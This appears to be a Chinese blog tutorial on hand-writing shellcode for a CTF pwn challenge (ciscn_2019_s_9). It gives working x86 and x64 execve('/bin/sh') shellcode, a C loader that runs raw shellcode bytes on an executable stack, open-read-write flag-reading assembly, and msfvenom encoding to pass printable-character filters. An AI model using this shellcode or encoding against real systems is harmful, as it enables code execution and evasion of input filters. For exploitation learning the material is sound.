一道题目

最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写

我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行

byXI1J.png

丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出

byjMBq.png

我们看一下 pwntools 直接生成的 shellcode ,可以看到有足足0x2c大小,栈是装不下的,所以需要我们手写 shellcode

byjfbt.png

byjbvj.png

常见获取shellcode的方法

pwntools

在 pwntools 里面使用 shellcraft 函数生成 shellcode ,使用该函数的时候需要在前面指定架构,因为每个架构生成的 shellcode 是不一样的

context(os = 'linux', arch = 'i386')    # os是指操作系统,arch指架构
shellcode = shellcraft.sh()

直接使用 shellcraft.sh() 可以直接生成汇编语言格式的 shellcode

这里拿 i386 架构的 shellcode 浅析一下

form pwn import *
context(os = 'linux', arch = 'i386')
shellcode = shellcraft.sh()
print(shellcode)

b6pFfK.png

这就是pwntools生成的shellcode

msf

msf是一个漏洞利用框架,可以使用msfvenom生成shellcode

直接 msfvenom --help 就可以查看相关命令

bTxawt.png

使用 --list 可以列出一些payload的信息

bTxhkV.png

msfvenom就是一个生成shellcode的工具,这里不做过多的介绍,关于该工具的更多使用,大家可以上网查阅

exploit-db

这是一个漏洞库,里面会有很多漏洞利用的shellcode

官网 : https://www.exploit-db.com/

该网站有很多最新或者以前的漏洞,里面一般都有exp,也可以从这些exp中学习shellcode

shell-storm

这个网站里面有很多大佬写的shellcode

网站 : http://shell-storm.org/shellcode/

shellcode编写

前置知识

首先我们学习一下系统调用,程序在执行到int 0x80的时候会进入内核态执行相应的系统调用,这时候eax/rax存放的是系统调用号,然后寄存器里面存放着各个参数

x86

x86程序的参数分别由ebx/ecx/edxesi/edi/ebp存放

x64

x64程序的参数分别由rdi/rsi/rdx/r10/r8/r9存放

简单的shellcode

这里我们使用汇编来编写练习一下shellcode的编写

x86
;nasm -f elf32 shellcode_x86.asm
;ld -m elf_i386 -o shellcode_x64 shellcode_x86.o

global _start
_start:
        push 0x68732f    ;push '/sh'
        push 0x6e69622f    ;push '/bin'
        mov ebx, esp    ;ebx='/bin/sh'
        xor edx, edx    ;edx=0
        xor ecx, ecx    ;ecx=0
        mov eax, 0xb    eax=0xb
        int 0x80
x64
;nasm -f elf64 shellcode_x64.asm
;ld -m elf_x86_64 -o shellcode_x64 shellcode_x64.o

global _start
_start:
        mov rbx, '/bin/sh'    ;将'/bin/sh'赋值给rbx
        push rbx    ;将rbx的值,即'/bin/sh'压入栈中
        push rsp    ;将esp的值压入栈中
        pop rdi        ;将esp赋值给rdi,rdi='/bin/sh'
        xor rsi, rsi    ;rsi=0
        xor rdx, rdx    ;rdx=0
        mov rax, 0x3b    ;rax=0x3b
        syscall

其实归根到底就是调用 execve('/bin/sh', 0, 0)

我们测试一下,使用 objdump 将文件的汇编代码以及十六进制显示出来 objdump -d shellcode_x64.o

bTvSUK.png

然后我们写一个加载器,加载这个shellcode,我们把shellcode设置为局部变量,这样就会加载在栈上,然后我们给栈可执行权限 -z execstack

// gcc exp.c -o exp -g -z execstack
#include <stdio.h>
#include <string.h>
int main(){
    char buf[] = "\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x54\x5f\x48\x31\xf6\x48\x31\xd2\xb8\x3b\x00\x00\x00\x0f\x05";    // shellcode
        void (*fp)(void) = (void (*)(void))buf;
        printf("Length : %ld\n", strlen(buf));
        fp();
        return 0;
}

我们运行,成功拿到一个shell

bTxtOA.png

orw

在PWN比赛中有时会遇到开了沙盒的题目,这时候大部分系统调用都被禁用了,一般open、read、write这三个系统调用不会被禁用,所以我们可以使用orw直接将flag打印出来

;x86
global _start
_start:
    push 'flag'        ;fd=open(flag, 0)
    mov eax, 0x5
    mov ebx, esp
    mov ecx, 0
    int 0x80
    mov ebx, eax    ;read(fd, addr, 0x40)
    mov eax, 0x3
    mov ecx, addr
    mov edx, 0x40
    int 0x80
    mov ebx, 0x1    ;write(1, addr, 0x40)
    mov eax, 0x4
    mov ecx, addr
    mov edx, 0x40
    int 0x80

shellcode变形

有时候程序会只让我们输入可打印字符,这是我们就需要将shellcode进行变形

对于x86的话,msf里面有个内置的encoder模块,可以生成编码过后的shellcode

b7SmUx.png

也可以使用管道符来对自己的shellcode进行编码

cat shellcode | msfvenom -p linux -e x86/alpha_upper BufferRegister=eax

参考文章

https://blog.csdn.net/qq_35495684/article/details/79583232

https://docs.pwntools.com/